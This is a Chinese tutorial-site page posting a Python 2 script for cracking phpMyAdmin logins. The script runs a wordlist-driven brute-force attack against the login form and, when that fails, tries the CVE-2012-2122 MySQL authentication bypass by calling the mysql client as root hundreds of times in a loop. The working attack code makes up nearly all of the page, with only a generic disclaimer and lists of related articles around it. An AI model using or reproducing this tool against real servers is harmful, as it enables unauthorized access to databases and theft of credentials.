首页
所有分类
TAGS
文字工具 EMOJI BIBLE
编程 Python

Python写的PHPMyAdmin暴力破解工具代码

Posted in Python onAugust 06, 2014

PHPMyAdmin暴力破解,加上CVE-2012-2122 MySQL Authentication Bypass Vulnerability漏洞利用。

#!/usr/bin/env python
import urllib 
import urllib2 
import cookielib 
import sys
import subprocess
def Crack(url,username,password):
	opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.LWPCookieJar())) 
	headers = {'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1; WOW64)'}
	params = urllib.urlencode({'pma_username': username, 'pma_password': password})
	request = urllib2.Request(url+"/index.php", params,headers)
	response = opener.open(request) 
	a=response.read() 
	if a.find('Database server')!=-1 and a.find('name="login_form"')==-1:
		return username,password
	return 0
def MySQLAuthenticationBypassCheck(host,port):
	i=0
	while i<300:
		i=i+1
		subprocess.Popen("mysql --host=%s -P %s -uroot -piswin" % (host,port),shell=True).wait()
if __name__ == '__main__':
	if len(sys.argv)<4:
		print "#author:iswin\n#useage python pma.py https://3water.com/phpmyadmin/ username.txt password.txt"
		sys.exit()
	print "Bruting,Pleas wait..."
	for name in open(sys.argv[2],"r"):
		for passw in open(sys.argv[3],"r"):
			state=Crack(sys.argv[1],name,passw)
			if state!=0:
				print "\nBrute successful"
				print "UserName: "+state[0]+"PassWord: "+state[1]
				sys.exit()
	print "Sorry,Brute failed...,try to use MySQLAuthenticationBypassCheck"
	choice=raw_input('Warning:This function needs mysql environment.\nY:Try to MySQLAuthenticationBypassCheck\nOthers:Exit\n')
	if choice=='Y' or choice=='y':
		host=raw_input('Host:')
		port=raw_input('Port:')
		MySQLAuthenticationBypassCheck(host,port)

Python写的PHPMyAdmin暴力破解工具代码

- Author -

junjie

声明:登载此文出于传递更多信息之目的,并不意味着赞同其观点或证实其描述。

Python 相关文章推荐
简单的Python的curses库使用教程
Apr 11 Python
Python2.x版本中cmp()方法的使用教程
May 14 Python
python制作花瓣网美女图片爬虫
Oct 28 Python
Python中类的初始化特殊方法
Dec 01 Python
[原创]Python入门教程3. 列表基本操作【定义、运算、常用函数】
Oct 30 Python
Python_查看sqlite3表结构,查询语句的示例代码
Jul 17 Python
对django后台admin下拉框进行过滤的实例
Jul 26 Python
Django中自定义模型管理器(Manager)及方法
Sep 23 Python
感知器基础原理及python实现过程详解
Sep 30 Python
python实现从wind导入数据
Dec 03 Python
Django-xadmin后台导入json数据及后台显示信息图标和主题更改方式
Mar 11 Python
使用Python实现微信拍一拍功能的思路代码
Jul 09 Python
Python写的Discuz7.2版faq.php注入漏洞工具
Aug 06 #Python
Python常用列表数据结构小结
Aug 06 #Python
Python生成pdf文件的方法
Aug 04 #Python
Tornado Web服务器多进程启动的2个方法
Aug 04 #Python
Python通过解析网页实现看报程序的方法
Aug 04 #Python
基于Python实现的扫雷游戏实例代码
Aug 01 #Python
python脚本实现查找webshell的方法
Jul 31 #Python
pyqt5(3) Normal From(1) JSON(10) MybatisPlus(2) MapReduce(1) DFA(1) pycharm(6) linux(15) css3 (2) Qlabel(1)
You might like
2014年10个最佳的PHP图像操作库
2014/07/14 PHP
php的sso单点登录实现方法
2015/01/08 PHP
[原创]PHP实现生成vcf vcard文件功能类定义与使用方法详解【附demo源码下载】
2017/09/02 PHP
PHP实现链式操作的三种方法详解
2017/11/16 PHP
用Javascript实现UTF8编码转换成gb2312编码
2006/12/22 Javascript
js 取时间差去掉周六周日实现代码
2012/12/25 Javascript
checkbox使用示例
2013/08/23 Javascript
JavaScript 事件对象介绍
2015/04/13 Javascript
javascript表格的渲染组件
2015/07/03 Javascript
jQuery实现仿微软首页感应鼠标变化滑动窗口效果
2015/10/08 Javascript
js实现选中页面文字将其分享到新浪微博
2015/11/05 Javascript
JavaScript ParseFloat()方法
2015/12/18 Javascript
angularjs表格ng-table使用备忘录
2016/03/09 Javascript
jquery easyui datagrid实现增加,修改,删除方法总结
2016/05/25 Javascript
浅谈JSON.stringify()和JOSN.parse()方法的不同
2016/08/29 Javascript
JQuery Ajax WebService传递参数的简单实例
2016/11/02 Javascript
Vue.js中 v-model 指令的修饰符详解
2018/12/03 Javascript
JS中比较两个Object数组是否相等方法实例
2019/11/11 Javascript
vue使用一些外部插件及样式的配置代码
2019/11/18 Javascript
基于vuex实现购物车功能
2021/01/10 Vue.js
详解Python字典小结
2018/10/20 Python
Python3.6实现带有简单界面的有道翻译小程序
2019/04/16 Python
IronPython连接MySQL的方法步骤
2019/12/27 Python
Python将二维列表list的数据输出(TXT,Excel)
2020/04/23 Python
CSS实现进度条和订单进度条的示例
2020/11/05 HTML / CSS
一套英文Java笔试题面试题
2016/04/21 面试题
销售自荐信
2013/10/22 职场文书
会议活动邀请函
2014/01/27 职场文书
收银员岗位职责
2014/02/07 职场文书
超市开店计划书
2014/04/26 职场文书
篮球赛口号
2014/06/18 职场文书
带刀到教室的检讨书
2014/10/04 职场文书
结婚通知短信大全
2015/04/17 职场文书
劳保用品管理制度范本
2015/08/06 职场文书
培训心得体会怎么写
2016/01/25 职场文书
爱岗敬业事迹材料
2019/06/20 职场文书